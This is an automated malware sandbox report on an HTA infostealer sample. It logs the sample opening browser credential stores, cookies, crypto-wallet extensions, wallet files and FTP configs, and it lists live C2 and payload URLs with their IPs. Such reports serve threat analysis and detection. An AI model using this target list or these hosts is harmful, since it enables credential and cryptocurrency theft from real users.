              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1208, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1208, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              2
              OS Credential Dumping
              11
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              1
              Scheduled Task/Job
              111
              Process Injection
              3
              Obfuscated Files or Information
              LSASS Memory22
              System Information Discovery
              Remote Desktop Protocol41
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Scheduled Task/Job
              Logon Script (Windows)1
              Scheduled Task/Job
              2
              Software Packing
              Security Account Manager121
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell
              Login HookLogin Hook1
              DLL Side-Loading
              NTDS1
              Process Discovery
              Distributed Component Object Model2
              Clipboard Data
              114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets121
              Virtualization/Sandbox Evasion
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
              Process Injection
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579459 Sample: winwidgetshp.mp4.hta Startdate: 22/12/2024 Architecture: WINDOWS Score: 100 27 learningypr.click 2->27 29 atsuka.thrivezest.org 2->29 31 klipcatepiu0.shop 2->31 39 Suricata IDS alerts for network traffic 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 11 other signatures 2->45 9 mshta.exe 1 2->9         started        signatures3 process4 signatures5 55 Suspicious powershell command line found 9->55 12 powershell.exe 18 9->12         started        process6 signatures7 57 Suspicious powershell command line found 12->57 59 Found many strings related to Crypto-Wallets (likely being stolen) 12->59 61 Bypasses PowerShell execution policy 12->61 63 Found suspicious powershell code related to unpacking or dynamic code loading 12->63 15 powershell.exe 15 18 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 35 atsuka.thrivezest.org 104.21.18.182, 443, 49720 CLOUDFLARENETUS United States 15->35 37 Injects a PE file into a foreign processes 15->37 21 powershell.exe 15->21         started        25 conhost.exe 15->25         started        signatures10 process11 dnsIp12 33 learningypr.click 104.21.48.1, 443, 50007, 50008 CLOUDFLARENETUS United States 21->33 47 Query firmware table information (likely to detect VMs) 21->47 49 Found many strings related to Crypto-Wallets (likely being stolen) 21->49 51 Tries to harvest and steal ftp login credentials 21->51 53 2 other signatures 21->53 signatures13

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              winwidgetshp.mp4.hta8%ReversingLabsBinary.Trojan.Generic
              winwidgetshp.mp4.hta15%VirustotalBrowse
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              atsuka.thrivezest.org
              104.21.18.182
              truetrue
                unknown
                learningypr.click
                104.21.48.1
                truetrue
                  unknown
                  klipcatepiu0.shop
                  unknown
                  unknownfalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    necklacebudi.latfalse
                      high
                      aspecteirs.latfalse
                        high
                        energyaffai.latfalse
                          high
                          learningypr.clicktrue
                            unknown
                            sustainskelet.latfalse
                              high
                              crosshuaht.latfalse
                                high
                                rapeflowwj.latfalse
                                  high
                                  https://atsuka.thrivezest.org/hubus.xlsxtrue
                                    unknown
                                    grannyejh.latfalse
                                      high
                                      discokeyus.latfalse
                                        high
                                        https://learningypr.click/apitrue
                                          unknown
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://learningypr.clicpowershell.exe, 00000016.00000002.3671860372.00000000051D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2190852545.0000000005D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3469276083.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://klipcatepiu0.shop/int_clp_ldr_sha.txtEPpowershell.exe, 00000016.00000002.3668769118.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://stackoverflow.com/q/14436606/23354powershell.exe, 00000006.00000002.3510342893.00000000074D0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                  high
                                                  https://github.com/mgravell/protobuf-netJpowershell.exe, 00000006.00000002.3510342893.00000000074D0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                    high
                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.3469276083.00000000050C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://klipcatepiu0.shop/int_clp_ldr_sha.txtpowershell.exe, 00000016.00000002.3668769118.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://learningypr.click/piKpowershell.exe, 00000016.00000002.3671615432.00000000051C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.3469276083.00000000050C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://go.micropowershell.exe, 00000004.00000002.2187440452.0000000005677000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://contoso.com/Licensepowershell.exe, 00000006.00000002.3469276083.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://contoso.com/Iconpowershell.exe, 00000006.00000002.3469276083.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://github.com/mgravell/protobuf-netpowershell.exe, 00000006.00000002.3510342893.00000000074D0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://learningypr.click/apiHJpowershell.exe, 00000016.00000002.3671615432.00000000051C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://learningypr.click/apics7powershell.exe, 00000016.00000002.3671969810.00000000051D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.3469276083.00000000050C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://klipcatepiu0.shop/WyxIpowershell.exe, 00000016.00000002.3671615432.00000000051C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://github.com/mgravell/protobuf-netipowershell.exe, 00000006.00000002.3510342893.00000000074D0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://learningypr.click/api9powershell.exe, 00000016.00000002.3668719743.0000000002CC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://klipcatepiu0.shop/XHpowershell.exe, 00000016.00000002.3671615432.00000000051C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2187440452.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3469276083.0000000004F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://stackoverflow.com/q/11564914/23354;powershell.exe, 00000006.00000002.3510342893.00000000074D0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://stackoverflow.com/q/2152978/23354powershell.exe, 00000006.00000002.3510342893.00000000074D0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://atsuka.thrivezest.orgpowershell.exe, 00000006.00000002.3469276083.00000000050C7000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                          unknown
                                                                                          https://contoso.com/powershell.exe, 00000006.00000002.3469276083.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2190852545.0000000005D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3469276083.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://atsuka.thripowershell.exe, 00000004.00000002.2187440452.0000000004F77000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                unknown
                                                                                                https://learningypr.click/apihKpowershell.exe, 00000016.00000002.3671615432.00000000051C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://klipcatepiu0.shop/powershell.exe, 00000016.00000002.3671615432.00000000051C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2187440452.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3469276083.0000000004F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://learningypr.click/powershell.exe, 00000016.00000002.3671615432.00000000051C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://klipcatepiu0.shop/int_clp_ldr_sha.txt/537.36powershell.exe, 00000016.00000002.3663856176.0000000002C49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          104.21.48.1
                                                                                                          learningypr.clickUnited States
                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                          104.21.18.182
                                                                                                          atsuka.thrivezest.orgUnited States
                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1579459
                                                                                                          Start date and time:2024-12-22 13:41:10 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 9m 20s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:23
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:winwidgetshp.mp4.hta
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.spyw.evad.winHTA@9/6@3/2
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 50%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 89%
                                                                                                          • Number of executed functions: 144
                                                                                                          • Number of non-executed functions: 40
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .hta
                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                          • Stop behavior analysis, all processes terminated
                                                                                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 20.190.181.0, 20.223.35.26, 2.16.158.169, 23.218.208.109, 13.107.246.63, 4.245.163.56, 20.86.201.138
                                                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com, tse1.mm.bing.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Execution Graph export aborted for target mshta.exe, PID 7064 because there are no executed function
                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 2656 because it is empty
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                          TimeTypeDescription
                                                                                                          07:42:09API Interceptor53x Sleep call for process: powershell.exe modified
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          104.21.48.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                          • twirpx.org/administrator/index.php
                                                                                                          SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.antipromil.site/7ykh/
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          CLOUDFLARENETUShttps://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • 104.21.234.144
                                                                                                          nshkppc.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 104.24.135.181
                                                                                                          swift-bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 104.18.38.10
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                          • 104.21.67.146
                                                                                                          7394231845.htmlGet hashmaliciousUnknownBrowse
                                                                                                          • 104.17.25.14
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                          • 104.21.67.146
